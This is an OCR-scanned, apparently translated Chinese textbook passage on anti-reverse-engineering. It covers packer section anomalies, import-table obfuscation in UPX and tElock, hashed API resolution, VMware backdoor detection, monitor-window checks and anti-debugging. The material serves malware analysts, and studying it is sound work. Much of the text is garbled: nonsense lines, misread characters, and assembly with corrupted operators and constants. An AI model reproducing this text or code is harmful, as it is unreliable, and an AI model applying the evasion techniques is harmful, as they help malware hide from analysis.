O “Strings”? (FFP ) AO ( 默认 情况 下 不 会 打开 该 窗口 ) 显示 的 可 辨别 学 符 串 非常 少 。 

通常 仪 显示 少 数 导 人 库 和 哨 数 的 名 称 。 
口 一 个 或 多 个 程序 节 既 可 写 ， 又 可 执行 。 
O 使 用 UPX0 或 .shrink 等 非 标准 的 节 名 称 。 




















沙 盒 环 境 
(DUDUDUDDUUDUDUUDUUUUUDUIUDUDUDUDDUDDUDUID UI 
00000000000000000000 VMware DD DDDDDDDDDDDDDU 
人 
COOL 
SEAN O E E o o o E [9E DEO B. B E a BIB IBS eo LET EIE IBI a EIE LT LB 
O E E o E E o a o E e E e e e a a E E E liti Windows) DUDU 
A EHE o E Eo E B E E D DH o e a a 


导航 栏 中 显示 的 信息 可 以 与 二 进 制 文件 中 的 每 个 段 的 属性 关联 起 来 , 以 确定 每 个 窗口 中 显示 
的 信息 是 否 一 致 。 这 个 二 进 制 文件 的 段 代 码 清单 如 下 所 未 : 














Name Start End RWXDL Align Base Type Class 
€ UPXO | 00401000 00407000 RW X . L para 0001 public CODE 
@ UPX1 00407000 00409000 RW X . L para 0002 public CODE 

UPX2 00409000 0040908 RW . . L para 0003 public DATA 

.idata 0040908C 004090CO R W. . L para 0003 public XTRN 

UPX2  004090CO 0040A000 RW . . L para 0003 public DATA 


D 参见 http://www.vmware.com/; 
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在 这 个 例子 中 , HEt UPX (O) AME UPX ( 6 ) 组 成 的 整个 地 址 范围 (00401000 ~ 00409000 ) 
被 标记 为 可 执行 文件 (已 设置 X 标 志 )。 基 于 这 一 事实 ,我 们 应 该 会 看 到 整个 导航 市 以 彩色 显示 ， 
表示 它们 是 代码 。 但 情况 并 非 如 此 ,而 且 观 察 发 现 ，UPX0 的 整个 范围 全 为 空 , 未 被 占用 ,这些 都 
应 引起 我 们 的 高 度 怀疑 。 在 IDA, UPX 的 节 头 部 包含 以 下 行 : 











UPX0:00401000 ; Section 1. (virtual address 00001000) 

UPX0:00401000 ; Virtual size : 00006000 ( 24576.) 
UPX0:00401000 ;G Section size in file : 00000000 ( 0.) 
UPX0:00401000 ; Offset to raw data for section: 00000200 
UPX0:00401000 ;O Flags E0000080: Bss Executable Readable Writable 








使 用 IDA 在 静态 上 下 文中 (根本 不 执行 二 进 制 文件 ) 执行 解压 操作 的 技巧 将 在 213 节 讨 论 。 
21.1.3 ”导入 的 函数 模糊 


为 了 避免 泄漏 与 二 进 制 文件 可 能 执行 的 与 可 能 操作 有 关 的 信息 , 另 一 种 反 静 态 分 析 技 巧 专用 
于 难以 确定 模糊 二 进 制 文件 所 使 用 的 共享 库 和 库 男 数 。 多 数 情况 下 ， 这 种 技巧 可 以 令 dumpbin、 
1dd 和 objdump 等 工具 失效 ， 无 法 列 出 库 依 赖 关 系 。 

这 类 模糊 对 IDA 的 影响 在 “导出 ”窗口 中 表现 得 尤为 明显 。 前 面 七 lock 示例 的 “导出 ” 窗 
口 的 整个 内 容 如 下 所 示 : 























Address Ordinal Name Library 
0041EC2E GetModuleHandleA kernel32 
0041EC36 MessageBoxA user32 


只 有 两 个 外 部 函数 被 引用 : GetModulehandleA (来 自 kernel32.dll ) 和 MessageBoxA ( 3€ El 
user32.dll )。 从 这 个 简短 的 代码 段 ， 几 平 不 可 能 推断 出 程序 的 任何 行为 。 那 么 ， 这 样 一 个 程序 如 
何 完 成 有 用 的 任务 呢 ? 同样 , 在 这 方面 , 程序 采用 的 技巧 多 种 多 样 , 但 是 基本 上 归结 于 一 个 事实 ， 
即 程序 本 和 号 必须 加 载 它 依赖 的 任何 其 他 库 , 一 旦 库 被 加 载 , 程序 必须 在 这 些 库 中 定位 所 需 的 任何 
国 数 。 多 数 情况 下 ， 这 些 任务 由 去 模糊 存根 完成 ， 然 后 再 将 控制 权 转 交 给 去 模糊 后 的 程序 。 这 个 
过 程 的 最 终 目的 是 正确 初始 化 程序 的 导入 表 , 就 好 像 整个 过 程 是 由 操作 系统 上 自己 的 加 载 需 执行 的 
= 

对 Windows 二 进 制 文件 而 言 ,一 种 简单 的 方法 是 使 用 LoadLibrary 函数 按 名 称 加 载 所 需 的 库 ， 
然后 在 每 个 库 中 使 用 GetProcAddress 函数 执行 函数 地 址 查询 ,为 了 使 用 这 些 函 数 , 程序 要 么 显 式 
链接 它们 ， 要 么 采取 其 他 方法 查询 它们 。tElock 示例 的 “名 称 ” 列 表 中 并 未 包含 任何 一 个 这 样 的 
PA, m Pi UPX 示例 的 “名 称 ”( Name ) 列表 则 包含 了 这 两 个 函数 。 

















Address Ordinal Name Library 
0040908C LoadLibraryA KERNEL32 
00409090 GetProcAddress KERNEL32 
00409094 ExitProcess KERNEL32 


0040909C RegCloseKey ADVAPI32 
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004090A4 atoi 
004090AC ExitWindowsEx 
004090B4 InternetOpenA 
004090BC recv 


CRTDLL 
USER32 
WININET 
WSOCk32 


负责 重建 导入 表 的 UPX 代码 如 代码 清单 21-1 所 示 。 


代码 清单 21-1 UPX 中 的 导入 表 重 建 

UPX1:0040886C loc 40886C: ; CODE XREF: start«12kbEYV/j 
UPX1:0040886C mov eax, [edi] 
UPX1:0040886E Or eax, eax 
UPX1:00408870 ]z short loc 4088AE 
UPX1:00408872 mov ebx, [edi+4] 
UPX1:00408875 lea eax, |eax+esi+8000h] 
UPX1:0040887C add ebx, esi 
UPX1:0040887E push eax 
UPX1:0040887F add edi, 8 

€ UPX1:00408882 call dword ptr [esi«808Ch] ; LoadLibraryA 
UPX1:00408888 xchg eax, ebp 
UPX1:00408889 
UPX1:00408889 loc 408889: ; CODE XREF: start«146Y j 
UPX1:00408889 mov al, [edi] 
UPX1:0040888B inc edi 
UPX1:0040888C or al, al 
UPX1:0040888E jz short loc 40886C 
UPX1:00408890 mov ecx, edi 
UPX1:00408892 push edi 
UPX1:00408893 dec eax 
UPX1:00408894 repne scasb 
UPX1:00408896 push ebp 

 UPX1:00408897 call dword ptr [esi«8090h] ; GetProcAddress 
UPX1:0040889D Or eax, eax 
UPX1:0040889F ]z short loc 4088A8 

© UPX1:004088A1 mov [ebx], eax ; Save to import table 
UPX1:004088A3 add ebx, 4 
UPX1:004088A6 jmp short loc 408889 
文 个 例子 包含 一 个 负责 调用 LoadLibraryA? (9) 的 外 层 循环 和 一 个 负责 调用 GetProcAddress 


(99) 的 内 层 循环 。 每 次 成 功 调 用 GetProcAddress 后 ， 新 获取 的 函数 地 址 存储 在 重建 后 的 导 人 表 
Dei. 

这 些 循环 作为 UPX 去 模糊 存根 的 最 后 
数 名 称 的 字 
iu. DE, Æ UPX 中 ， 只 有 所 需 的 字符 串 被 解压 后 ， 相 关 库 才 色 


回 到 tElock 示例 ， 它 遇 到 的 问题 有 所 不 同 。 由 于 只 有 两 个 导入 图 数 ， 既 不 是 LoadLibraryA 


(D 许多 接受 字 


"TED ZS E DI Windows P 











被 加 和 载 。 


函数 分 为 两 个 版 本 :一 种 版 本 接受 ASCI 字符 串 , 一 种 版 本 接受 Unicode 字符 串 。 


ix pR ZI ASCH 版 本 带 A J, m Unicode 版 本 则 带 W 后 级 。 


部 分 执行 ， 因 为 每 个 图 数 包含 指 癌 一 个 库 名 称 或 明 
符 串 指针 参数 ， 且 相关 的 字符 串 保 存在 压缩 数据 区 域 ， 以 避免 被 strings 实用 工具 检 
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也 不 是 GetProcAddress, JA, tElock 实用 工具 如 何 像 UPX 一 样 执 行 函数 解析 任务 呢 ? 所 有 
Windows 进程 根据 kernel32.dll 运行 ， 这 表示 kernel32.dll 为 所 有 进程 保存 在 内 存 中 。 如 果 一 个 程 
序 能 够 定位 kernel32.dll， 那 么 要 定位 这 个 DLL 中 的 任何 函数 ， 包 括 LoadLibraryA 和 GetProc- 
Address， 就 相对 容易 一 些 。 如 前 所 述 ， 使 用 这 两 个 函数 ， 你 可 以 加 载 进程 所 需 的 任何 其 他 库 ， 
并 定位 这 些 库 中 的 所 有 必需 咀 数 。 在 论文 “Understanding Windows shelleode" "rP, Skape 讨论 了 
一 些 技 巧 ,说明 如 何 完 成 这 个 任务 。 虽 人 然 {Elock 并 没有 使 用 Skape 详细 介绍 的 技巧 , 但 是 它们 之 
则 有 许多 相似 之 处 ,其 最 终 目 的 是 模糊 加 载 和 链接 过 程 。 如 果 不 仔细 跟 踊 程序 的 指令 ,你 很 容易 
忽略 程序 加 和 载 了 一 个 库 或 查询 了 一 个 函数 地 址 。 下 面 的 代码 片段 说 明了 tElock 如 何 定 位 
LoadLibraryA 的 地 址 : 





.Shrink:0041D1EA4 cmp dword ptr [eax], 64616F4Ch 
.Shrink:0041D1EA jnz short loc 41D226 
.shrink:0041D1EC cmp dword ptr [eax«4], 7262694Ch 
.Shrink:0041D1F3 jnz short loc 41D226 
.Shrink:0041D1F5 cmp dword ptr [eax«8], 41797261h 
.shrink:0041D1FC jnz short loc 41D226 





很 明显 ,这 段 代 码 快速 连续 进行 了 儿 次 比较 。 但 我 们 并 不 十 分 清楚 这 些 比较 的 作用 。 重新 格 
式 化 每 次 比较 所 使 用 的 操作 数 ， 我 们 获得 一 些 启示 。 格 式 化 后 的 代码 如 下 所 示 : 





.Shrink:0041D1E4 cmp dword ptr [eax], 'daoL' 
.Shrink:0041D1EA jnz short loc 41D226 
.Shrink:0041D1EC cmp dword ptr [eax«4], 'rbil' 
.Shrink:0041D1F3 jnz short loc 41D226 
.Shrink:0041D1F5 cmp dword ptr [eax«8], 'Ayra' 
.Shrink:0041D1FC jnz short loc 41D226 





每 个 十 六 进 制 常量 实际 上 是 一 个 由 4 个 ASCII 字 符 组 成 的 序列 , 它们 按 顺 序 (前面 讲 过 , x86 
是 一 种 小 端 处 理 需 ， 因 此 我 们 需要 颠倒 顺序 读 取 这 些 字符 ) 拼写 成 LoadLibraryA。 如 果 这 3 个 比 
较 成 功 ， 则 说 明 tElock 已 经 定位 了 LoadLibraryA 的 导出 表 和 条目， 再 经 过 几 个 简单 的 操作 ， 将 可 
以 获得 这 个 因数 的 地 址 , 并 用 它 加 载 其 他 库 。 使 用 tElock 进行 子 数 查询 有 一 个 有 趣 的 特点 ， 即 它 
似乎 有 些 “ 抗 拒 ” 字 符 串 分 析 ， 因 为 直接 骨 入 到 程序 指令 中 的 4 字 节 常量 看 起 来 并 不 像 更 加 标准 
的 、 以 零 为 终止 符 的 字符 串 ， 因 而 并 未 包含 在 DA 生成 的 字符 串 列表 中 。 

使 用 UPX 和 全 lock 时 ,通过 仔细 分 析 程 序 代 码 手 动 重建 一 个 程序 的 导入 表 要 更 加 容易 一 些 ， 
因为 最 终 它们 都 将 包含 一 些 ASCI 字符 数据 ， 我 们 可 以 利用 这 些 数据 确定 程序 到 底 引 用 了 哪些 
库 和 子 数 。Skape 的 论文 详细 介绍 了 一 个 孔 数 解析 过 程 ， 在 这 个 过 程 中 , 代码 中 根本 没有 出 现任 
何 字符 串 。 论 文 讨 论 的 基本 概念 是 为 你 需要 解析 的 每 个 函数 的 名 称 预先 计算 一 个 唯一 的 散 列 ? 
值 。 要 解析 每 一 个 函数 ,首先 搜索 一 个 库 的 导出 名 称 表 ， 然后 对 表 中 的 每 个 名 称 进行 散 列 处 理 ， 
再 将 得 到 的 散 列 值 与 为 相关 函数 预先 计算 的 散 列 值 进 行 比较 ， 如 果 这 两 个 散 列 值 相互 匹配 ， 则 















































A A gr 


D 参见 http://www.hick.org/code/skape/papers/win32-shellcode.pdf， 尤 其 是 第 3 章 的 3.3 节 。 
O 散 列 函数 是 一 个 算术 过 程 ， 它 由 一 个 任意 大 小 的 输入 ( 如 一 个 字符 串 ) 获得 一 个 固定 大 小 ( 如 4 字 节 ) 的 结果 。 
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说 明 你 已 经 找到 这 个 函数 的 位 置 ， 并 在 相关 库 的 导出 地 址 表 中 轻 多 找到 它 的 地 址 。 为 了 议 态 分 
析 以 这 种 方式 模糊 人 处理 的 二 进 制 文件 ， 你 需要 了 人 解 对 每 个 哨 数 名 称 使 用 的 散 列 算法 ， 并 将 该 算 
法 应 用 于 程序 搜索 的 库 导 出 的 所 有 名 称 。 拥 有 完整 的 散 列 表 后 ， 你 就 可 以 耳 接 查询 你 在 程序 中 
遇 到 的 每 一 个 散 列 值 ， 并 确定 该 散 列 值 对 应 哪 一 个 函数 。* 如 下 所 示 是 一 个 由 kernel32.dll 生成 
的 散 列 表 的 一 部 分 : 
€ GetProcAddress : 8AOFBSE2 

GetProcessAffinityMask : B9756EFE 

GetProcessHandleCount : B50EB87C 

GetProcessHeap ` C246DA44 


GetProcessHeaps : A18AAB23 
GetProcessId : BEO5EDO7 


需要 注意 的 是 ， 散 列 值 特定 于 某 个 特殊 的 库 所 使 用 的 散 列 函数 ,并 且 可 能 因 库 而 异 。 使 用 这 
个 特殊 的 表 ， 如 果 在 程序 中 遇 到 散 列 值 8A0FB5E2 ( @ )， 我 们 可 以 迅速 确定 程序 正 尝 试 查询 
GetProcAddress 函数 的 地 址 。 

Skape 用 于 解析 贤 数 名 称 的 散 列 值 , 最 初 是 为 了 供 利 用 Windows 漏洞 的 破解 程序 使 用 而 开发 
和 记录 的 ， 但 是 它们 已 经 被 用 在 模糊 程序 中 。 例 如 ，WinLincense 模糊 实用 工具 就 利用 这 类 散 列 
技 马 来 隐藏 它 的 行为 。 

关于 导入 表 的 最 后 一 点 提示 是 :IDA 有 时 会 为 你 提供 线索 , 指出 一 个 程序 的 导入 表 存 在 问题 。 
模糊 Windows 二 进 制 文件 第 第 会 使 用 经 过 大 量 修改 的 导入 表 ， 这 时 IDA 会 通知 你 ， 这 样 的 二 进 
制 文件 似乎 有 些 不 正常 。 在 这 类 情况 下 ，IDA 显示 的 警告 对 话 框 如 图 21-3 所 示 。 


x 


b The imports segment seems to be destroyed. This MAY mean that 
f l the file was packed or otherwise modified in order to make it 
^. — mare difficult to analyze. If you want to see the imports 

segment in the original form, please reload it with the 


make imports section" checkbox deared. 






































[ Don't display his message again 








图 21-3 导入 段 被 改编 的 警告 对 话 框 


这 个 对 话 框 提 供 了 一 条 最 早 的 提示 , 指出 一 个 二 进 制 文件 可 能 经 过 某 种 形式 的 模糊 处 理 。 该 
对 话 框 可 以 作为 一 个 警告 ， 次 明 该 二 进 制 文件 可 能 难以 分 析 。 因 此 , 在 分 析 该 文件 时 ， 你 应 当 小 
心 行事 O 


21.1.4 有 针对 性 地 攻击 分 析 工 具 


提 到 这 类 反 逆 向 工程 工具 , 是 因为 它 具 有 阻止 逆向 工程 的 潜力 。 许 多 逆向 工程 工具 都 可 以 看 

















(D Hex-Rays 在 http:/www.hexblog.com/?p=93 中 介绍 了 IDA 的 调试 功能 以 计算 这 些 散 列 值 。 
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成 是 高 度 专 一 化 的 解析 器 ， 它 们 处 理 输入 数据 ， 提 供 某 种 摘要 信息 或 显示 相关 细 市 。 作 为 软件 ， 
它们 也 和 所 有 其 他 软件 一 样 ， 存 在 各 种 类 型 的 漏洞 。 具 体 来 说 ,错误 地 人 处理 用 户 提供 的 数据 ， 有 
时 可 能 会 导致 可 被 他 人 利用 的 条 件 。 

除了 我 们 已 经 讨论 的 技巧 外 ,希望 防止 软件 被 分 析 的 程序 员 可 能 会 采取 更 加 主动 的 方式 阻止 
肥 逆 向 工程 。 利 用 精心 构造 的 输入 文件 ， 可 以 创建 一 个 特殊 的 程序 ， 这 个 程序 既 能 够 正常 运行 ， 
又 存在 很 大 的 缺陷 , 足以 利用 逆 辐 工程 工具 中 存在 的 漏洞 。 这 类 漏洞 并 不 稼 见 , 但 已 经 被 人 们 记 
录 下 来 , 包括 IDA 中 的 漏洞 ”"。 攻击 者 的 目的 是 在 某 个 时 候 将 恶意 软件 加 载 到 IDA 中 。 至 少 , 攻 
击 者 可 以 拒绝 服务 ,， 这样， 在 能 够 创建 数据 库 之 前 ，IDA 就 会 月 演 。 男 外 ， 攻击 者 可 以 访问 分 析 
人 员 的 计算 机 和 相关 网 络 。 关 注 这 类 攻击 的 用 户 应 考虑 在 沙 盒 环境 中 执行 所 有 初步 分 析 任 务 。 例 
如 ,你 可 以 在 一 个 沙 盒 中 运行 IDA, 为 所 有 二 进 制 文件 创建 初始 数据 库 。 然 后 ， 再 将 初始 数据 库 
(理论 上 它们 没有 任何 恶意 功能 ) 分 发 给 其 他 分 析 人 员 ， 这 样 这 些 分 析 人 员 根 本 不 需要 接触 原始 
的 二 进 制 文件 。 


21.2. 及 动态 分 析 技 巧 


我 们 在 前 面 几 市 讨论 的 反 议 态 分 析 拉 巧 中 , 没有 一 种 技巧 会 给 一 个 程序 是 否 运行 造成 任何 影 
IN. 实际 上 ,虽然 它们 使 你 仅 仪 通过 静态 分 析 拉 巧 难以 理解 一 个 程序 的 真正 行为 , 但 是 它们 无 法 
阻止 该 程序 运行 , 否则 , 它们 将 使 一 个 程序 失去 作用 , 因而 我 们 也 就 完全 没有 必要 分 析 这 个 程序 。 

程序 必须 运行 才能 有 效 地 工作 ， 鉴 于 此 ， 动 态 分 析 由 在 观 凤 运动 中 (运行 中 ) 的 程序 行为 ， 
而 不 是 观察 静止 的 程序 〈 如 采 程 序 并 未 运行 ， 则 使 用 静态 分 析 )。 本 万 中 ， 我 们 将 简单 介绍 一 些 
更 加 第 见 的 反动 态 分 析 扩 巧 。 多 数 情 况 下 ,这 些 技巧 一 般 与 静态 分 析 工 具 无 关 , 但 如 来 它们 的 功 
能 有 重合 的 地 方 ， 我 们 将 会 指出 来 。 从 第 24 草 开 始 ， 我 们 将 回 过 头 来 讨论 这 些 技巧 对 IDA 的 集 
JACI] nie EAR o 


21.2.4 检测 虚拟 化 


配置 沙 盒 环境 的 一 个 最 常见 的 目的 是 利用 虚拟 化 软件 ( 如 VMware) 为 恶意 软件 〈 或 者 这 方 
面 的 任何 其 他 相关 软件 ) 提供 一 个 执行 环境 。 这 类 环境 的 优势 在 于 它们 通常 提供 检查 点 和 回 深 功 
HE. 能够 迅速 将 沙 盒 恢 复 到 一 个 已 知 的 “清洁 ”状态 。 使 用 这 类 环境 作为 沙 合 基础 的 缺点 在 于 程 
序 能 够 相对 容易 地 检测 出 ( 特别 是 在 32 位 x86 平 台 上 ), 它 在 一 个 虚拟 环境 中 运行 。 假设 虚 拟 化 
等 同 于 监视 ,那么 许多 希望 保持 隐秘 的 程序 一 旦 确定 目 己 在 虚拟 机 中 运行 ， 将 会 立即 关闭 。 
下 面 我 们 将 介绍 一 些 技巧 , 在 虚拟 环境 中 运行 的 程序 使 用 这 些 技巧 确定 它们 是 在 虚拟 机 中 运 
行 ， 还 是 在 本 地 硬件 上 运行 。 
口 检测 虚拟 化 软件 。 通 常 ， 用 户 会 在 虚拟 机 中 安装 帮 助 应 用 程序 ， 以 方便 虚拟 机 与 它 的 主 
机 操作 系统 之 间 的 通信 ， 或 者 只 是 为 了 改善 虚拟 机 的 性 能 。VMware Tools 就 是 一 个 这 样 






















































































(D 参见 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0115。 更 多 详情 参见 http://labs.idefense.com/intelligence/ 
vulnerabilities/display.php?1id=189, 
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的 软件 。 在 虚拟 机 中 运行 的 程序 能 够 轻易 检测 到 这 种 类 型 的 软件 。 例 如 ， 如 果 在 一 个 微 
软 Windows 虚拟 机 中 安装 VMware Tools, 它 会 创建 任何 程序 都 可 以 读 取 的 Windows 注册 
表 项 。 在 虚拟 机 中 运行 恶意 程序 很 少 需 要 VMware Tools， 因 此 ， 你 不 应 将 它 安装 到 虚拟 
机 中 ， 以 避免 在 虚拟 机 中 的 程序 轻易 检测 到 虚拟 机 的 存在 。 

口 检测 虚拟 化 硬件 。 虚 拟 机 利用 虚拟 人 硬件 抽象 层 为 虚拟 机 与 主 计算 机 的 本 地 人 硬件 提供 接口 。 
在 虚拟 机 中 运行 的 软件 通常 很 容易 检测 到 虚拟 人 硬件 的 特性 。 例 如, VMware 被 分 配 了 它 目 
己 的 唯一 标识 符 ( OUI) ”， 供 它 的 虚拟 化 网 络 适配器 使 用 。 观 察 到 一 个 特定 于 VMware 
的 OUL 是 程序 在 虚拟 机 中 运行 的 可 靠 证 据 。 注 意 ， 使 用 主 计算 机 上 的 配置 选项 ， 通 稍 可 
以 修改 分 配给 虚拟 网 络 适 配 需 的 MAC 地 址 。 

口 检测 虚拟 机 的 行为 。 一 些 虚 拟 化 平台 包含 后 门 式 的 通信 通道 ， 以 方便 虚拟 机 与 主机 软件 
之 间 的 通信 。 例 如 ， 下 面 的 4 行 代码 可 用 于 确定 你 是 否 在 一 个 VMware 虚拟 机 中 运行 >: 




















mov eax, Ox564D5868 ; VMXh' 

mov ecx, 10 

xor ebx, ebx 

mov dx, Ox5658 ; MN 
€9 in eax, dx 


如 果 你 在 虚拟 机 中 ， 这 段 代码 将 导致 EBX 寄存 器 包含 0x564D5868 这 个 值 。 如 果 你 不 

在 虚拟 机 中 , 根据 你 使 用 的 主机 操作 系统 , 这 段 代码 将 造成 一 个 异常 , 或 者 不 会 改变 EBX 

寄存 融 。 这 个 指令 序列 利用 了 一 个 事实 , 即 用 户 空间 程序 通常 不 使 用 或 不 允许 使 用 x86 in 

令 (@ ), 但 是 ,在 VMware 中 ,这 个 指令 序列 可 用 于 检测 一 个 特殊 的 通信 通道 , VMware 

客户 操作 系统 使 用 这 个 通道 与 它们 的 主机 操作 系统 进行 通信 。 例 如 ，VMware Tools 使 用 
这 个 通道 在 主机 与 客户 操作 系统 之 间 交 换 数 据 ( 如 剪贴 板 内 容 )。 

OQ 检测 特定 于 处 理 器 的 行为 变化 。 完 美的 虚拟 化 很 难 实现 。 理 想 情况 下 ， 程 序 应 该 不 能 检 
测 到 虚拟 化 环境 与 本 地 硬件 之 间 的 任何 差异 。 但 是 ， 这 种 情况 很 少 发 生 。 观 察 在 本 地 便 
件 与 虚拟 机 环境 中 执行 的 x86 sidt 指令 的 行为 差异 后 ,Joanna Rutkowska 开发 出 她 的 “ 红 
JL" ? (redpill) VMware 检测 技巧 。 

虽然 并 不 是 相关 主题 的 第 一 篇 论文 ,但 Tom Liston 5j Ed Skoudis 的 论文 “On the Cutting Edge: 

Thwarting Virtual Machine Detection” 为 我 们 简要 介绍 了 各 种 虚拟 机 检测 技巧 。 


























21.2.2 检测 “检测 工具 ” 
创建 沙 盒 环境 后 ,在 执行 你 想 要 观察 的 任何 程序 之 前 ,你 都 要 安装 检测 工具 ， 以 正确 收集 和 





(D 网 络 适配器 厂家 分 配 的 MAC 地址 的 前 3 个 字 节 由 一 个 OUI 组 成 。 

(2) 参见 http://www.codeproject.com/KB/system/VmDetect.aspx ( 作者 : Elias Bachaalany )。 
(3) 参见 http://www.invisiblethings.org/papers/redpill.html o 

(4) 参见 http://handlers.sans.org/tliston/ThwartingVMDetection Liston Skoudis.pdf. 
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记录 与 你 所 分 析 的 程序 的 行为 有 关 的 信息 。 有 大 量 工 具 可 用 于 执行 这 类 监控 任务 。Process 
Monitor" (来自 微软 Sysinternals” 套件 ) 和 Wireshark“ 是 两 个 被 人 们 广泛 使 用 的 工具 。Process 
Monitor 是 一 种 实用 工具 ， 它 能 够 监控 与 任何 正在 运行 的 Windows 进程 有 关 的 某 些 行为 ， 包括 访 
Ih] Windows 注册 表 和 文件 系统 活动 。Wireshark 是 一 个 网 络 数据 包 捕 获 和 分 析 工 具 ， 筑 用 于 分 析 
恶意 软件 生成 的 网 络 流量 。 

生性 多 疑 的 恶意 软件 作者 可 能 会 指挥 他 们 的 软件 搜索 这 类 监控 程序 的 运行 实例 。 他 们 采用 
的 技巧 包括 : 扫描 活动 进程 列表 ， 查 找 已 知 与 这 类 监控 软件 有 关 的 进程 名 称 ， 以 及 扫描 所 有 活 
z) Windows 应 用 程序 的 标题 栏 文本 ， 从 中 搜索 已 知 的 字符 串 。 你 还 可 以 进行 更 加 深入 的 搜索 , 
如 使 用 一 些 软 件 搜索 某 个 检测 软件 所 使 用 的 Windows GUI 组 件 的 特定 特征 。 例 如 ，WinLincense 
模糊 /保护 程序 使 用 下 面 的 函数 调用 确定 Filemon (Process Monitor 的 前 身 ) 实用 工具 当前 是 否 
正在 运行 : 


























if (FindWindow("FilemonClass", NULL)) ( 
//exit because Filemon is running 


} 

这 里 , FindWindow 函数 用 于 根据 窗口 的 注册 类 名 称 "FilemonClass" CrfidE f OERE ) 搜索 一 
个 项 级 应 用 程序 窗口 。 如 果 发 现 一 个 被 请 求 类 的 窗口 ， 则 认为 Filemon 正在 运行 ， 程序 将 立即 
终止 。 





21.2.3 ”检测 调试 器 


除了 简单 地 观察 程序 外 ， 分 析 人 员 还 可 以 使 用 调试 器 完全 控制 需要 分 析 的 程序 的 执行 过 程 。 
对 模糊 程序 使 用 调试 硕 的 一 个 惯常 做 法 是 运行 模糊 程序 足够 长 的 时 间 , 以 完成 任何 解压 或 加 密 任 
务 ， 然 后 利用 调试 天 的 内 存 访问 功能 从 内 存 中 提取 出 “去 模糊 ”后 的 进程 映像 。 多 数 情 况 下 , 使 
用 标准 的 静态 分 析 工 具 和 技巧 就 能 够 分 析 提 取出 的 进程 映像 。 

模糊 实用 工具 的 作者 清楚 地 知道 这 类 调试 需 辅 助 的 去 模糊 技巧 , 因此 , 他 们 已 经 采取 许多 措 
施 , 防止 他 人 使 用 调试 需 执 行 他 们 的 模糊 程序 。 检 测 到 调试 器 确实 存在 的 程序 往往 会 选择 立即 终 
止 ， 而 不 是 继续 执行 操作 ， 以 免 分 析 人 员 更 加 轻松 地 确定 程序 的 行为 。 

检测 调试 器 是 否 存 在 的 技巧 包括 通过 常用 的 API 函数 ( 如 Windows IsDebuggerPresent 函数 ) 
直接 查 询 操作 系统 ,或 使 用 较为 低级 的 方法 , 即 检查 因为 使 用 调试 器 而 生成 的 内 存 或 处 理 需 项 目 
(artifact); 例如， 就 后 一 种 技巧 而 言 ， 我们 可 以 检测 处 理 絮 是 否 设 置 了 跟踪 ( 单 步 ) 标志 。 有 时 ， 
我 们 还 可 以 检测 到 特定 的 调试 器 。 例 如 , Windows 内 核 调 试 器 SoftIce 可 以 通过 \\.\NTICE 设备 ( 用 
于 与 调试 融通 信 ) 检测 出 来 。 

只 要 你 知道 自己 到 底 想 要 搜索 什么 , 那么 检测 调试 器 就 并 非 难事 ,而且 在 静态 分 析 过 程 中 你 






































(D 参见 http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx . 
(2) 参见 http://technet.microsoft.com/en-us/sysinternals/default.aspx - 
(3) 参见 http://www.wireshark.org/ 
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也 可 以 轻易 发 现 这 类 检测 尝试 (除非 同时 使 用 了 反 静 态 分 析 技 巧 ) 有 关 调 试 磊 检测 的 更 多 信息 ， 
请 查阅 Nicolas Falliere 的 文章 “Windows Anti-Debug Reference””， 这 篇 文章 全 面 讲 述 了 各 种 
Windows 反 调 试 技巧 。 另 外 ，OpenRCE 维护 着 一 个 反 逆 向 工程 技巧 数据 库 ”， 其 中 包含 大 量 特定 
T AR HASC EJ s 


21.2.4 防止 调试 


如 有 果 一 个 调试 大 设法 保持 住 了 隐秘 状态 〈 不 可 检测 )， 仍 然 有 许多 技巧 可 以 阻止 它 运 行 。 这 
些 其 他 的 技巧 尝试 通过 引入 伪造 的 断 点 、 清 除 便 件 断 点 、 阻 但 反 汇 编 ， 使 选择 合适 的 断 点 地 址 变 
得 困难 ， 或 者 通过 阻止 调试 融 依 附 到 一 个 进程 上 , 令 调 试问 “不 知 所 措 ”。Nicolas Falliere 的 文章 
中 讨论 的 许多 技巧 适用 于 阻止 调试 融 正 向 运行 。 

程序 可 以 通过 有 意 生 成 异常 来 阻止 调试 。 许多 时 候 ， 附 加 的 调试 磊 将 捕获 这 个 异常 ， 而 调试 
大 的 用 户 则 面临 着 两 个 任务 : 分 析 异 和 常 为 何 发 生 ， 决 定 是 否 将 异 篆 传递 给 被 调试 的 程序 。 对 于 
x86 int 3 之 类 的 软件 断 点 ， 你 将 很 难 区 分 由 基础 程序 生成 的 软件 中 断 与 由 真正 的 调试 锅 断 点 生 
成 的 软件 中 断 。 这 正 是 模糊 程序 创建 者 希望 看 到 的 结果 。 在 这 类 情况 下 ,你 可 以 通过 仔细 分 析 反 
汇编 代码 清单 来 了 解 程序 的 真正 控制 流 ， 但 在 静态 分 析 时 ， 你 需要 付出 更 大 的 努力 。 

对 程序 的 一 些 组 成 部 分 以 某 种 方式 编码 会 有 双重 效果 : 一 方面 ， 编 码 可 以 防止 静态 分 析 ， 
因为 这 时 反 汇 编 并 不 可 行 ; 男 一 方面 ， 编 码 可 以 阻止 调试 ， 因 为 这 时 很 难 设置 断 点 。 即 使 每 条 
指令 的 起 始 地 址 已 和 ,但 软件 断 点 只 有 在 指令 被 完全 解码 后 才能 设置 ， 因 为 以 插入 一 个 软件 断 
点 的 方式 来 修改 指令 ， 可 能 会 导致 对 模糊 代码 的 加 密 失 败 ; 如 果 执 行 到 这 个 断 点 ， 可 能 会 导致 
TET AAD o 

此 外 , 一 些 去 模糊 实用 程序 对 进程 内 的 字 节 范围 计算 样 验 和 。 如 果 在 正 对 其 计算 校 验 和 的 字 
节 范 围 内 设置 一 个 或 多 个 软件 断 点 ， 将 会 生成 错误 的 校 验 和 ， 程 序 也 可 能 会 终止 。 

Linux 平台 上 的 Shiva ELF 模糊 工具 利用 一 种 叫做 “进程 互相 跟 中 ”( mutual ptrace ) 的 方法 
防止 他 人 使 用 调试 硕 分 析 Shiva 的 行为 。 






































进程 跟踪 

O LE ELLE D] ptacel process tracing APIO OOOO UmsÜUDDOUUDUDOUUUDUUI 
EE a O o E o E E o e E o E GNUD DIDI sede DD TED D DE BL D [] An 
AEE E IER EI LEE EI UE EHI D] A E EL a E E a E E DIS OMC DI ILLE E (EL LI 
(DUUDDUDUDUDUDUUUUUUDUUIUUDUDUDUDUDUDUDUDDUDUUDUU UI 
(DUUDUDUDUUUDOUDUDUDUDUDDUDDUDUDU POSIXwait [ E] LE DL B D DE UE LI D] 
中 
